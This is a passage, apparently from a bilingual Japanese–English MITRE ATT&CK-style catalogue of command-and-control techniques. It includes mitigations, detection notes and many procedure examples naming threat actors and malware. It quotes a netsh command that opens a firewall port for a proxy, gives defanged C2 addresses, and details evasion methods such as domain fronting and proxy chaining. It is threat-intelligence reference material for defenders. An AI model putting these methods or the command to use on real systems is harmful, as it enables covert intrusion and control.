traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 敵対者は、FTP等のファイル転送プロトコルでC2通信を行うことがある。Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 敵対者は、SMTP/IMAP/POP3等でC2通信を行うことがある。Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 敵対者は、DNSを用いてC2通信を行うことがある。Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 敵対者は、MQTT等のPub/SubプロトコルでC2通信を行うことがある。Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 アプリケーション層プロトコルに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During FrostyGoop Incident, the adversary initiated Layer Two Tunnelling Protocol (L2TP) connections to Moscow-based IP addresses. Magic Hound malware has used IRC for C2. Rocke issued wget requests from infected systems to the C2. TeamTNT has used an IRC bot for C2 communications. INC Ransom has used valid accounts over RDP to connect to targeted systems. Velvet Ant has used reverse SSH tunnels to communicate to victim devices. Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519. Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols. Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server. Hildegard has used an IRC channel for C2 communications. Siloscape connects to an IRC server for C2. Sliver can utilize the Wireguard VPN protocol for command and control. Clambling has the ability to use Telnet for communication. QUIETEXIT can use an inverse negotiated SSH connection as part of its C2. Raspberry Robin is capable of contacting the TOR network for delivering second-stage payloads. Nightdoor uses TCP and UDP communication for command and control traffic. 敵対者は、プロキシを経由してC2通信を中継し、出所を隠蔽することがある。 Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. 敵対者は、内部システムをプロキシにしてC2通信を中継することがある。Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. 敵対者は、外部プロキシを経由してC2通信を中継することがある。Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion. 敵対者は、複数のプロキシを連鎖させて出所を隠蔽することがある。Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. 敵対者は、ドメインフロンティングでC2の宛先を偽装することがある。Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored). SSL/TLS通信を検査し、暗号化された悪意ある通信を検出する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 プロキシに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 For Operation Sharpshooter, the threat actors used the ExpressVPN service to hide their location. During Operation Wocao, threat actors used a custom proxy tool called "Agent" which has support for multiple hops. During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic. During C0027, Scattered Spider installed the open-source rsocx reverse proxy tool on a targeted ESXi appliance. Mustang Panda proxied communication through the Cloudflare CDN service during RedDelta Modified PlugX Infection Chain Operations. During Operation MidnightEclipse, threat actors used the GO Simple Tunnel reverse proxy tool. During RedPenguin, UNC3886 used malware capable of establishing a SOCKS proxy connection to a specified IP and port. During SharePoint ToolShell Exploitation, threat actors used Fast Reverse Proxy to communicate with C2. During Salesforce Data Exfiltration, threat actors used Mullvad VPN IPs to proxy voice phishing calls. During the 2025 Poland Wiper Attacks, the adversaries utilized the rsocx tool identified as `r.exe` and `rsocx.exe` to tunnel within the internal infrastructure using a Reverse SOCKS Proxy. Turla RPC backdoors have included local UPnP RPC proxies. Sandworm Team's BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally. Gamaredon Group has used the Cloudflare Tunnel client to proxy C2 traffic. CopyKittens has used the AirVPN service for operational activity. Magic Hound has used Fast Reverse Proxy (FRP) for RDP traffic. MuddyWater has used NordVPN to proxy phishing emails, making them appear to originate from France. APT41 used a tool called CLASSFON to covertly proxy network communications. Blue Mockingbird has used FRP, ssf, and Venom to establish SOCKS proxy connections. Fox Kitten has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers. Windigo has delivered a generic Windows proxy Win32/Glubteta.M. Windigo has also used multiple reverse proxy chains as part of their C2 infrastructure. LAPSUS$ has leverage NordVPN for its egress points when targeting intended victims. POLONIUM has used the AirVPN service for operational activity. Earth Lusca adopted Cloudflare as a proxy for compromised servers. Scattered Spider has used proxy networks to hamper detection and has installed legitimate proxy tools on VMware vCenter and adversary-controlled VMs. Volt Typhoon has used compromised devices and customized versions of open source tools such as FRP (Fast Reverse Proxy), Earthworm, and Impacket to proxy network traffic. MoustachedBouncer has used a reverse proxy tool similar to the GitHub repository revsocks. Cinnamon Tempest has used a customized version of the Iox port-forwarding and proxy tool. Contagious Interview has leveraged Astrill VPN for C2. MirrorFace has used the GO Simple Tunnel (GOST) proxy tool. HTRAN can proxy TCP socket connections to obfuscate command and control infrastructure. netsh can be used to set up a proxy tunnel to allow remote host access to an infected host. XTunnel relays traffic between a C2 server and a victim. NETWIRE can implement use of proxies to pivot traffic. Vasport is capable of tunneling though a proxy. BADCALL functions as a proxy server between the victim and C2 server. HARDRAIN uses the command <code>cmd.exe /c netsh firewall add portopening TCP 443 "adp"</code> and makes the victim machine function as a proxy server. QuasarRAT can communicate over a reverse proxy using SOCKS5. A TYPEFRAME variant can force the compromised system to function as a proxy server. Bisonal has supported use of a proxy server. Socksbot can start SOCKS proxy threads. jRAT can serve as a SOCKS proxy server. Remcos uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying. AuditCred can utilize proxy for communications. Cardinal RAT can act as a reverse proxy. HOPLIGHT has multiple proxy options that mask traffic between the malware and the remote operators. PoshC2 contains modules that allow for use of proxies in command and control. Dridex contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers. Ursnif has used a peer-to-peer (P2P) network for C2. ZxShell can set up an HTTP or SOCKS proxy. PLEAD has the ability to proxy network communications. TSCookie has the ability to proxy communications with command and control (C2) servers. Aria-body has the ability to use a reverse SOCKS proxy module. SDBbot has the ability to use port forwarding to establish a proxy between a target host and C2. Kessel can use a proxy during exfiltration if set in the configuration. ngrok can be used to proxy connections to machines located behind NAT or firewalls. SombRAT has the ability to use an embedded SOCKS proxy in C2 communications. RainyDay can use proxy tools including boost_proxy_client for reverse proxy functionality. KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet. WarzoneRAT has the capability to act as a reverse proxy. Green Lambert can use proxies for C2 traffic. FunnyDream can identify and use configured proxies in a compromised network for C2 communication. KEYPLUG has used Cloudflare CDN associated infrastructure to redirect C2 communications to malicious domains. BADHATCH can use SOCKS4 and SOCKS5 proxies to connect to actor-controlled C2 servers. BADHATCH can also emulate a reverse proxy on a compromised machine to connect with actor-controlled C2 servers. Samurai has the ability to proxy connections to specified remote IPs and ports through a a proxy module. ZIPLINE can create a proxy server on compromised hosts. LITTLELAMB.WOOLTEA has the ability to function as a SOCKS proxy. LunarWeb has the ability to use a HTTP proxy server for C&C communications. FRP can proxy communications through a server in public IP space to local servers located behind a NAT or firewall. reGeorg can establish an HTTP or SOCKS proxy to tunnel data in and out of a network. Neo-reGeorg has the ability to establish a SOCKS5 proxy on a compromised web server. Kapeka can identify system proxy settings via `WinHttpGetIEProxyConfigForCurrentUser()` during initialization and utilize these settings for subsequent command and control operations. GoBear implements SOCKS5 proxy functionality. Sagerunex uses several proxy configuration settings to ensure connectivity. RansomHub can use a proxy to connect to remote SFTP servers. Havoc has the ability to route HTTP/S communications through designated proxies. 敵対者は、リムーバブルメディアを介して（エアギャップ環境等で）C2通信を行うことがある。 Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access. OSを安全に構成し、攻撃対象領域を縮小する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 リムーバブルメディア経由の通信に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 APT28 uses a tool that captures information from air-gapped computers via an infected USB and transfers it to network-connected computer when the USB is inserted. Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic. USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim. 敵対者は、ICMP等の非アプリ層プロトコルを用いてC2通信を行うことがある。 Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 システムやアカウントを監査し、不正な活動を検出する。 非アプリケーション層プロトコルに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Wocao, threat actors used a custom protocol for command and control. During C0021, the threat actors used TCP for some C2 communications. During Cutting Edge, threat actors used the Unix socket and a reverse TCP shell for C2 communications. During the 2022 Ukraine Electric Power Attack, Sandworm Team proxied C2 communications within a TLS-based tunnel. KV Botnet Activity command and control traffic uses a non-standard, likely custom protocol for communication. Versa Director Zero Day Exploitation used a non-standard TCP session to initialize communication prior to establishing HTTPS command and control. Mustang Panda communicated over TCP 5000 from adversary administrative servers to adversary command and control nodes during RedDelta Modified PlugX Infection Chain Operations. During RedPenguin, UNC3886 leveraged malware that used UDP and TCP sockets for C2. An APT3 downloader establishes SOCKS5 connections for its initial C2. FIN6 has used Metasploit Bind and Reverse TCP stagers. Gamaredon Group has used SOCKS5 over port 9050 for C2 communication. PLATINUM has used the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control. HAFNIUM has used TCP for C2. Mustang Panda has utilized TCP-based reverse shells using cmd.exe. BackdoorDiplomacy has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities. BITTER has used TCP for C2 communications. Ember Bear uses socket-based tunneling utilities for command and control purposes such as NetCat and Go Simple Tunnel (GOST). These tunnels are used to push interactive command prompts over the created sockets. Ember Bear has also used reverse TCP connections from Meterpreter installations to communicate back with C2 infrastructure. Metador has used TCP for C2. ToddyCat has used a passive backdoor that receives commands with UDP packets. UNC3886 has deployed backdoors that communicate over TCP to compromised network devices and over VMCI to ESXi hosts. Taidoor can use TCP for C2 communications. PlugX can be configured to use raw TCP or UDP for command and control. The Regin malware platform can use ICMP to communicate between infected computers. Derusbi binds to a raw socket on a random source port between 31800 and 31900 for C2. Uroburos can communicate through custom methodologies for UDP, ICMP, and TCP that use distinct sessions to ride over the legitimate protocols. gh0st RAT has used an encrypted protocol within TCP segments to communicate with the C2. If NETEAGLE does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, NETEAGLE will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs. BUBBLEWRAP can communicate using SOCKS. RARSTONE uses SSL to encrypt its communication with its C2 server. Some variants of FakeM use SSL to communicate with C2 servers. Misdat network traffic communicates over a raw socket. Mis-Type network traffic can communicate over a raw socket. Crimson uses a custom TCP protocol for C2. Remsec is capable of using ICMP, TCP, and UDP for C2. Winnti for Windows can communicate using custom TCP. MoonWind completes network communication via raw sockets. Cobalt Strike can be configured to use TCP, ICMP, and UDP for C2 communications. WINDSHIELD C2 traffic can communicate via TCP raw sockets. PHOREAL communicates via ICMP for C2. Some Reaver variants use raw TCP for C2. NETWIRE can use TCP in C2 communications. Umbreon provides access to the system via SSH or any other protocol that uses PAM to authenticate. Bandook has a command built in to use a raw TCP socket. InvisiMole has used TCP to download additional modules. QuasarRAT can use TCP for C2 communication. Bisonal has used raw sockets for network communication. Carbon uses TCP and UDP for C2. OSX_OCEANLOTUS.D has used a custom binary protocol over port 443 for C2 traffic. HiddenWasp communicates with a simple network protocol over TCP. Winnti for Linux has used ICMP, custom TCP, and UDP in outbound communications. TSCookie can use ICMP to receive information on the destination server. Metamorfo has used raw TCP for C2. Aria-body has used TCP in C2 communications. SDBbot has the ability to communicate with C2 with TCP over port 443. Cryptoistic can use TCP in communications with C2. The PipeMon communication module can use a custom protocol based on TLS over TCP. Drovorub can use TCP to communicate between its agent and client modules. Anchor has used ICMP in C2 communications. WellMail can use TCP for C2 communications. Pay2Key has sent its public key to the C2 server over TCP. LookBack uses a custom binary protocol over sockets for C2 communications. The Penquin C2 mechanism is based on TCP and UDP packets. ShadowPad has used UDP for C2 communications. SombRAT has the ability to use TCP sockets to send data and ICMP to ping the C2 server. RainyDay can use TCP in C2 communications. Nebulae can use TCP in C2 communications. QakBot has the ability use TCP to send or receive C2 packets. Clambling has the ability to use TCP and UDP for communication. RCSession has the ability to use TCP and UDP in C2 communications. Gelsemium has the ability to use TCP and UDP in C2 communications. WarzoneRAT can communicate with its C2 server via TCP over port 5200. Lizar has used a raw TCP connection to communicate with the C2 server. Mythic supports WebSocket and TCP-based C2 profiles. MacMa has used a custom JSON-based protocol for its C&C communications. AuTo Stealer can use TCP to communicate with command and control servers. PingPull variants have the ability to communicate with C2 servers using ICMP or TCP. FunnyDream can communicate with C2 over TCP and UDP. SUGARUSH has used TCP for C2. KEYPLUG can use TCP and KCP (KERN Communications Protocol) over UDP for C2 communication. metaMain can establish an indirect and raw TCP socket-based connection to the C2 server. Mafalda can use raw TCP for C2. Brute Ratel C4 has the ability to use TCP for external C2. Royal establishes a TCP socket for C2 communication using the API `WSASocketW`. RotaJakiro uses a custom binary protocol using a type, length, value format over TCP. QUIETEXIT can establish a TCP connection as part of its initial connection to the C2. Sardonic can communicate with actor-controlled C2 servers by using a custom little-endian binary protocol. Samurai can use a proxy module to forward TCP packets to external hosts. Ninja can forward TCP packets between the C2 and a remote host. COATHANGER uses ICMP for transmitting configuration information to and from its command and control server. ZIPLINE can communicate with C2 using a custom binary protocol. LITTLELAMB.WOOLTEA can function as a stand-alone backdoor communicating over the `/tmp/clientsDownload.sock` socket. Spica can use JSON over WebSockets for C2 communications. LunarMail can ping a specific C2 URL with the ID of a victim machine in the subdomain. FRP can communicate over TCP, TCP stream multiplexing, KERN Communications Protocol (KCP), QUIC, and UDP. Cuckoo Stealer can use sockets for communications to its C2 server. SnappyTCP spawns a reverse TCP shell following an HTTP-based negotiation. reGeorg can tunnel TCP sessions into targeted networks. Neo-reGeorg can create multiple TCP connections for a single session. StealBit can use the Windows Socket networking library to communicate with attacker-controlled endpoints. J-magic can monitor incoming C2 communications sent over TCP to the compromised host. cd00r can monitor incoming C2 communications sent over TCP to the compromised host. REPTILE can communicate using TLS over raw TCP. MOPSLED can use a custom binary protocol over TCP for C2 communication. StarProxy has used TCP for C2 communications to target IPs or domains. StarProxy contained code to support both UDP and TCP connections. TONESHELL has utilized TCP-based reverse shells. InvisibleFerret has established a connection with the C2 server over TCP traffic. InvisibleFerret has also created a TCP reverse shell communicating via a socket connection over ports 1245, 80, 2245, 3001, and 5000. SystemBC has used raw TCP on non-standard ports, such as 4044, for C2 communications and for HTTP communications, which include downloading binaries. HiddenFace can use a custom TCP protocol over Port 443 for C2. 敵対者は、正規のWebサービスを悪用してC2通信を行うことがある。 Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. 敵対者は、正規Webサービス上にC2情報を隠して取得することがある。Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. 敵対者は、正規Webサービスを介して双方向C2通信を行うことがある。Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. 敵対者は、正規Webサービスを介して一方向のC2通信を行うことがある。Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response. 危険なWebコンテンツへのアクセスを制限する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 Webサービスに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Spalax, the threat actors used OneDrive and MediaFire to host payloads. During C0017, APT41 used the Cloudflare services for C2 communications. During C0027, Scattered Spider downloaded tools from sites including file.io, GitHub, and paste.ee. APT41 DUST used compromised Google Workspace accounts for command and control. Turla has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications. FIN6 has used Pastebin and Google Storage to host content for their operations. Gamaredon Group has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system. APT32 has used Dropbox, Amazon S3, and Google Drive to host malicious downloads. FIN8 has used <code>sslip.io</code>, a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control. Inception has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe. Rocke has used Pastebin, Gitee, and GitLab for Command and Control. Fox Kitten has used Amazon Web Services to host C2. Mustang Panda has used DropBox URLs to deliver variants of PlugX. Mustang Panda has also used Google Drive to host malicious downloads. TeamTNT has leveraged iplogger.org to send collected data back to C2. LazyScripter has used GitHub to host its payloads to operate spam campaigns. EXOTIC LILY has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads. RedCurl has used web services to download malicious files. APT42 has used various links, such as links with typo-squatted domains, links to Dropbox files and links to fake Google sites, in spearphishing operations. VOID MANTICORE has utilized Telegram API for C2. NETWIRE has used web services including Paste.ee to host payloads. Carbon can use Pastebin to receive C2 commands. ngrok has been used by threat actors to proxy C2 connections to ngrok service subdomains. Bazar downloads have been hosted on Google Docs. SharpStage has used a legitimate web service for evading detection. DropBook can communicate with its operators by exploiting the Simplenote, DropBox, and the social media platform, Facebook, where it can create fake accounts to control the backdoor and receive instructions. GuLoader has the ability to download malware from Google Drive. Sibot has used a legitimate compromised website to download DLLs to the victim's machine. Doki has used the dogechain.info API to generate a C2 address. Hildegard has downloaded scripts from GitHub. BoomBox can download files from Dropbox using a hardcoded access token. SMOKEDHAM has used Google Drive and Dropbox to host files downloaded by victims via malicious links. CharmPower can download additional modules from actor-controlled Amazon S3 buckets. WhisperGate can download additional payloads hosted on a Discord channel. Bumblebee has been downloaded to victim's machines from OneDrive. Brute Ratel C4 can use legitimate websites for external C2 channels including Slack, Discord, and MS Teams. DarkTortilla can retrieve its primary payload from public sites such as Pastebin and Textbin. BADHATCH can be utilized to abuse `sslip.io`, a free IP to domain mapping service, as part of actor-controlled C2 channels. Snip3 can download additional payloads from web services including Pastebin and top4top. SocGholish has used Amazon Web Services to host second-stage servers. Raspberry Robin second stage payloads can be hosted as RAR files, containing a malicious EXE and DLL, on Discord servers. Nightdoor can utilize Microsoft OneDrive or Google Drive for command and control purposes. CHIMNEYSWEEP has the ability to use use Telegram channels to return a list of commands to be executed, to download additional payloads, or to create a reverse shell. Latrodectus has used Google Firebase to download malicious installation scripts. ShrinkLocker uses a subdomain on the legitimate Cloudflare resource "trycloudflare[.]com" to obfuscate the threat actor's actual address and to tunnel information sent from victim systems. MOPSLED can use third-party web services such as GitHub and Google Drive for C2. RedLine Stealer has leveraged legitimate file sharing web services to host malicious payloads. BRICKSTORM has leveraged DNS web services to resolve C2 IP addresses including sslip.io and nip.io. BRICKSTORM has also utilized Cloudflare Workers for C2 communications. PureCrypter can use Telegram or Discord to send infection status messages. AshTag can download malicious payloads from file sharing services. 敵対者は、複数段階のC2チャネルを用いて通信を分離・隠蔽することがある。 Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 多段チャネルに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During RedPenguin, UNC3886 used malware with separate channels to request and carry out tasks from C2. An APT3 downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81. Lazarus Group has used multi-stage malware components that inject later stages into separate processes. MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back. APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor. Individual Uroburos implants can use multiple communication channels based on one of four available modes of operation. BACKSPACE attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs "louder" interactions with the malware. BLACKCOFFEE uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines. After initial compromise, Chaos will download a second stage to establish a more permanent presence on the affected system. Valak can download additional modules and malware capable of using separate C2 channels. The Bazar loader is used to download and execute the Bazar backdoor. Snip3 can download and execute additional payloads and modules over separate communication channels. LunarWeb can use one C2 URL for first contact and to upload information about the host computer and two additional C2 URLs for getting commands. Latrodectus has used a two-tiered C2 configuration with tier one nodes connecting to the victim and tier two nodes connecting to backend infrastructure. JumbledPath can communicate over a unique series of connections to send and retrieve data from exploited devices. 敵対者は、外部から標的環境へツールやファイルを転送（送り込み）することがある。 Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer). ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 ツールの送り込みに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors downloaded files and tools onto a victim machine. During Night Dragon, threat actors used administrative utilities to deliver Trojan components to remote systems. During CostaRicto, the threat actors downloaded malware and tools onto a compromised host. During Operation Honeybee, the threat actors downloaded additional malware and malicious scripts onto a compromised host. During FunnyDream, the threat actors downloaded additional droppers and backdoors onto a compromised system. During C0010, UNC3890 actors downloaded tools and malware onto a compromised host. During Operation Sharpshooter, additional payloads were downloaded after a target was infected with a first-stage downloader. During Operation Wocao, threat actors downloaded additional files to the infected system. During C0015, the threat actors downloaded additional tools and files onto a compromised network. During C0017, APT41 downloaded malicious payloads onto compromised systems. During C0018, the threat actors downloaded additional tools, such as Mimikatz and Sliver, as well as Cobalt Strike and AvosLocker ransomware onto the victim network. During C0021, the threat actors downloaded additional tools and files onto victim machines. During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host. During the SolarWinds Compromise, APT29 downloaded additional malware, such as TEARDROP and Cobalt Strike, onto a compromised host following initial access. During C0026, the threat actors downloaded malicious payloads onto select compromised hosts. During C0027, Scattered Spider downloaded tools using victim organization systems. During the 2015 Ukraine Electric Power Attack, Sandworm Team pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data. During Cutting Edge, threat actors leveraged exploits to download remote files to Ivanti Connect Secure VPNs. KV Botnet Activity included the use of scripts to download additional payloads when compromising network nodes. Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine's temporary directory. During HomeLand Justice, threat actors used web shells to download files to compromised infrastructure. APT41 DUST involved execution of `certutil.exe` via web shell to download the DUSTPAN dropper. During Outer Space, OilRig downloaded additional tools to comrpomised infrastructure. During ShadowRay, threat actors downloaded and executed the XMRig miner on targeted hosts. During Operation MidnightEclipse, threat actors downloaded additional payloads on compromised devices. Quad7 Activity has downloaded additional binaries from a remote File Transfer Protocol (FTP) server to compromised devices. During RedPenguin, UNC3886 used backdoor malware capable of downloading files to compromised infrastructure. During SharePoint ToolShell Exploitation, threat actors used a loader to download and execute ransomware. During the 2025 Poland Wiper Attacks, the adversaries downloaded malicious payloads to the victim server. Ke3chang has used tools to download files to compromised machines. APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant. Turla has used shellcode to download Meterpreter after compromising a victim. Darkhotel has used first-stage payloads that download additional malware from C2 servers. APT29 has downloaded additional tools and malware onto compromised networks. Molerats used executables to download malicious files from different sources. APT3 has a tool that can copy files to remote machines. APT18 can upload a file to the victim’s machine. Threat Group-3390 has downloaded additional malware and tools, including through the use of `certutil`, onto a compromised host . Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host. Sandworm Team has pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data. Dragonfly has copied and installed tools for operations once in the victim environment. Patchwork payloads download additional files from the C2 server. Winnti Group has downloaded an auxiliary program named ff.exe to infected machines. menuPass has installed updates and new malware on victims. FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload. Gamaredon Group has downloaded additional malware and tools onto a compromised host. For example, Gamaredon Group uses a backdoor script to retrieve and decode additional payloads once in victim environments. OilRig had downloaded remote files onto victim infrastructure. APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors. Magic Hound has downloaded additional code and files from servers onto victims. BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget). FIN8 has used remote code execution to download subsequent payloads. APT33 has downloaded additional files and programs from its C2 server. Leviathan has downloaded additional scripts and files from adversary-controlled servers. The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location. APT37 has downloaded second stage malware from compromised websites. PLATINUM has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel. MuddyWater has used malware that can upload additional files to the victim’s machine. MuddyWater has used PowerShell commands to install remote management and monitoring (RMM) software on the victim’s machine to conduct espionage and to exfiltrate data. Rancor has downloaded additional malware, including by using certutil. Gorgon Group malware can download additional files from C2 servers. Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers. The group's JavaScript backdoor is also capable of downloading files. Tropic Trooper has used a delivered trojan to download additional files. APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine. Additionally, APT38 has downloaded other payloads onto a victim’s machine. APT39 has downloaded tools to compromised hosts. WIRTE has downloaded PowerShell code from the C2 server to be executed. Silence has downloaded additional modules and malware to victim’s machines. TA505 has downloaded additional malware to execute on victim systems. GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN. Kimsuky has downloaded additional 